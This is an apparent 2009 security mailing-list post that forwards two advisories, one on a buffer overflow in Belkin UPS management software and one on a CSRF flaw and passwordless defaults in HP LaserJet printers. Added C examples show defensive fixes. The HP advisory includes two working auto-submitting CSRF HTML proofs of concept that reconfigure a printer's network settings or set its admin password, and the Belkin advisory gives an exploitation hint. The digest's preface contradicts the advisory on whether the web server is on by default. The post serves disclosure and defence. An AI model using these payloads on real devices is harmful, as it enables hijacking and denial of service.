    [guru] Security updates for infrastructure devices


    DATE: Tue, 31 Mar 2009 12:44:40 +0200
    The management software of the Belkin BullDog Plus UPS contains a buffer
    overflow in its HTTP basic authentication code. The web server is enabled
    by default.
    
    The factory settings of several HP network printers are also faulty: the
    configuration can be changed remotely through the web interface, but no
    password has been set. In addition, the web admin interface also contains
    a CSRF vulnerability.
    
    
    --- Begin Message ---
    
    Who:
    Belkin International, Inc.
    http://www.belkin.com
    
    What:
    Belkin BullDog Plus UPS Management Software
    v4.0.2 Build 1219
    
    UPS-Service.exe
    v1.0.0.1
    dated 12/19/2006
    
    How:
    The UPS management software contains a built-in web server which
    allows for remote management of the UPS. The management interface
    is protected by a username and password. Authentication is
    performed via Basic authentication.
    
    There is a small stack-based overflow in the base64 decoding
    routine which handles the Basic authentication data.
    
    Caveats:
    The web server is not enabled by default.
    
    Exploit:
    The size of the buffer is too small for shellcode, however, this
    can be stored in the GET request, which sits at esp+0x58.
    
    Fix:
    I was unable to locate any security contact information for this
    vendor, so I attempted to contact their support department, which
    turned out to be a waste of time.
    
    Workaround:
    As previously stated, the web server is not enabled by default.
    If you do need to use it, use a firewall or OS port filtering
    capabilities to restrict access.
    
    Elazar

    --- End Message ---
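An added example, not part of the forwarded advisory and not Belkin's code: a bounds-checked decoder for the credential carried in an HTTP Basic Authorization header, i.e. the length check the overflowing routine described above lacks. The "Basic " prefix, the fixed caller-supplied output buffer and the rejection of embedded NUL bytes are assumptions for this example.

```c
/* Added example (not Belkin's code): decode the base64 part of a
 * "Basic <credentials>" header into a caller-supplied fixed-size buffer.
 * The advisory describes a decoder that writes into a small stack buffer
 * without checking the decoded size; here the size is checked before any
 * byte is written, and malformed base64 is rejected rather than skipped. */
#include <stddef.h>
#include <string.h>

static int b64val(int c) {
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;                      /* '=' mid-string and junk land here */
}

/* Decodes hdr into out (NUL-terminated). Returns the decoded length, or
 * -1 for a non-Basic header, malformed base64, an embedded NUL, or a
 * result that would not fit in outlen bytes. */
int decode_basic_auth(const char *hdr, char *out, size_t outlen) {
    const char *p;
    size_t n, pad = 0, i, o = 0;
    unsigned int acc = 0;
    int bits = 0;

    if (strncmp(hdr, "Basic ", 6) != 0) return -1;
    p = hdr + 6;
    n = strlen(p);
    if (n == 0 || n % 4 != 0) return -1;      /* base64 comes in quads */
    if (p[n - 1] == '=') pad++;
    if (p[n - 2] == '=') pad++;
    /* The check the vulnerable routine lacked: decoded size (plus NUL)
     * must fit the destination BEFORE anything is written. */
    if (n / 4 * 3 - pad + 1 > outlen) return -1;
    for (i = 0; i < n - pad; i++) {
        int v = b64val((unsigned char)p[i]);
        if (v < 0) return -1;
        acc = (acc << 6) | (unsigned int)v;   /* only low 12 bits matter */
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            out[o++] = (char)((acc >> bits) & 0xff);
        }
    }
    if (memchr(out, 0, o) != NULL) return -1; /* "user:pass" has no NUL */
    out[o] = '\0';
    return (int)o;
}
```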
    --- Begin Message ---
                              Louhi Networks Oy
                           -= Security Advisory =-
    
    
          Advisory: HP LaserJet multiple models web management CSRF
                    vulnerability & insecure default configuration
      Release Date: 2009-03-17
     Last Modified: 2009-03-17
           Authors: Henri Lindberg, CISA
                    [henri d0t lindberg at louhi d0t fi]
    
       Application: HP Embedded Web Server
           Devices: HP LaserJet M1522n MFP,
                    HP Color LaserJet 2605dtn
                    possibly other HP products
      Attack type : CSRF
              Risk: Low
     Vendor Status: Issue documented in a customer notice
        References: http://www.louhinetworks.fi/advisory/HP_20090317.txt
    
    http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01684566
    
    
    Overview:
    
        Quote from http://www.hp.com:
    
        "Increase effectiveness and productivity with an easy-to-use
         high-performance HP MFP. HP spherical toner and an intelligent
         cartridge optimise print quality and reliability. Do more with
         fast, high-quality print, copy, scan and fax functionality.
    
         This affordable HP MFP delivers print, copy, scan and fax
         functionality. Hi-Speed USB 2.0 connectivity and fast,
         secure networking enable you to  easily share this device.
         Handle complex files with a 450 MHz processor and memory up to
         64 MB."
    
    
    Details:
    
         The default configuration of the device does not require the user
         to define a password for configuration changes.
    
         An insecure out-of-the-box configuration combined with a CSRF
         vulnerability in the web management interface allows an attacker to
         perform unwanted configuration changes through the user's browser.
    
         Successful exploitation requires:
         1) Out-of-the-box configuration (no management password)
         2) Internal user with access to web management interface
         3) Knowledge of target printer's DNS name or IP address
         4) Ability to lure internal user to a malicious website or
            ability to inject malicious HTML/javascript to website
            frequented by said internal user.
    
         The simplest management interfaces contain few interesting
         features; the most significant impact can be achieved with an
         invalid network configuration. This results in a denial-of-service
         condition, requiring manual reconfiguration in order to
         restore network connectivity.
    
         More advanced management interfaces based on the same software
         may contain additional features suitable for exploitation.
         It is recommended to check the features of the management interface
         in order to determine the actual risk for the product in use.
    
    Mitigation:
    
         1) Set administrator password
         2) Do not browse untrusted sites while logged on to the
            management interface
    
    
    Advisory timeline:
          2009-02-17  Contacted vendor through e-mail.
          2009-02-17  Vendor response.
          2009-03-12  Vendor decides not to patch but to release
                      a customer notice
          2009-03-17  Coordinated release of information
                      Vendor's customer notice:
                      HP Security Notice HPSN-2009-001 rev.1
                      HP LaserJet Printers, HP Edgeline Printers,
                      and HP Digital Senders - Unverified Input
    
    
    
    Proof of Concept:
    
    <html>
    <head><title>Network</title></head>
    <body onload="document.CSRF.submit();">
    
    <FORM name="CSRF" method="post" ACTION="http://1.2.3.4/hp/device/config_result_YesNo.html/config" style="display:none">
    <input name="Clear" value="Yes">
    <input name="Menu" value="NetIPChange">
    
    <input name="Configuration" value="IPConfig=Man&amp;IPAddr=1.1.1.1&amp;SN=2.2.2.2&amp;GW=3.3.3.3&amp;WINS=0.0.0.0">
    </form>
    </body>
    </html>
    
    
    An invalid value for the "Configuration" parameter sets the IP address, mask and gateway to 255.255.255.255.
    
    
    <html>
    <head><title>Set password</title></head>
    <body onload="document.CSRF.submit()">
    
    <FORM name="CSRF" method="post" ACTION="http://1.2.3.4/hp/device/set_config_password.html/config" style="display:none">
      <INPUT type="password" name="Password" MAXLENGTH="16" VALUE="evil">
      <INPUT type="password" name="ConfirmPassword" MAXLENGTH="16" VALUE="evil">
      <INPUT type="hidden" VALUE="System">
    </FORM>
    </body>
    </html>
    
    
    
    

    --- End Message ---
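An added example, not HP's code and not part of the advisory: a server-side validator for the (URL-decoded) "Configuration" value that the first PoC form above posts, which rejects the request on bad input instead of falling back to 255.255.255.255 as the advisory describes. The key names come from the PoC; the contiguous-netmask rule and treating WINS as optional are assumptions.

```c
/* Added example (not HP's code): server-side validation of the
 * "Configuration" parameter posted by the PoC form above. The advisory
 * notes that an invalid value is silently turned into 255.255.255.255
 * for IP, mask and gateway; this parser rejects bad input instead. */
#include <arpa/inet.h>
#include <stdint.h>
#include <string.h>

struct netcfg { struct in_addr ip, mask, gw; };
/* Strict dotted-quad parse of a length-delimited value (no guessing). */
static int parse_ipv4(const char *v, size_t len, struct in_addr *out) {
    char buf[16];
    if (len == 0 || len > 15) return 0;
    memcpy(buf, v, len); buf[len] = '\0';
    return inet_pton(AF_INET, buf, out) == 1;
}
/* Parses "IPConfig=Man&IPAddr=A&SN=M&GW=G[&WINS=W]" (key names from the
 * PoC). Returns 1 only if every address is valid and the mask is a
 * contiguous prefix; 0 means the request must be rejected unchanged. */
int parse_netcfg(const char *query, struct netcfg *cfg) {
    const char *p = query;
    int ok_mode = 0, ok_ip = 0, ok_mask = 0, ok_gw = 0;
    uint32_t m;
    memset(cfg, 0, sizeof *cfg);
    while (*p) {
        const char *eq = strchr(p, '='), *end = strchr(p, '&');
        size_t klen, vlen;
        if (!end) end = p + strlen(p);
        if (!eq || eq > end) return 0;                /* key without value */
        klen = (size_t)(eq - p); vlen = (size_t)(end - eq - 1);
        if (klen == 8 && !strncmp(p, "IPConfig", 8))
            ok_mode = (vlen == 3 && !strncmp(eq + 1, "Man", 3));
        else if (klen == 6 && !strncmp(p, "IPAddr", 6))
            ok_ip = parse_ipv4(eq + 1, vlen, &cfg->ip);
        else if (klen == 2 && !strncmp(p, "SN", 2))
            ok_mask = parse_ipv4(eq + 1, vlen, &cfg->mask);
        else if (klen == 2 && !strncmp(p, "GW", 2))
            ok_gw = parse_ipv4(eq + 1, vlen, &cfg->gw);
        else if (!(klen == 4 && !strncmp(p, "WINS", 4)))
            return 0;                                  /* unknown key */
        p = *end ? end + 1 : end;
    }
    if (!(ok_mode && ok_ip && ok_mask && ok_gw)) return 0;
    /* Assumed rule: mask must be a run of 1s, neither 0.0.0.0 nor
     * 255.255.255.255 (the value the device fell back to). */
    m = ntohl(cfg->mask.s_addr);
    return m != 0 && m != 0xFFFFFFFFu && ((~m + 1) & ~m) == 0;
}
```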
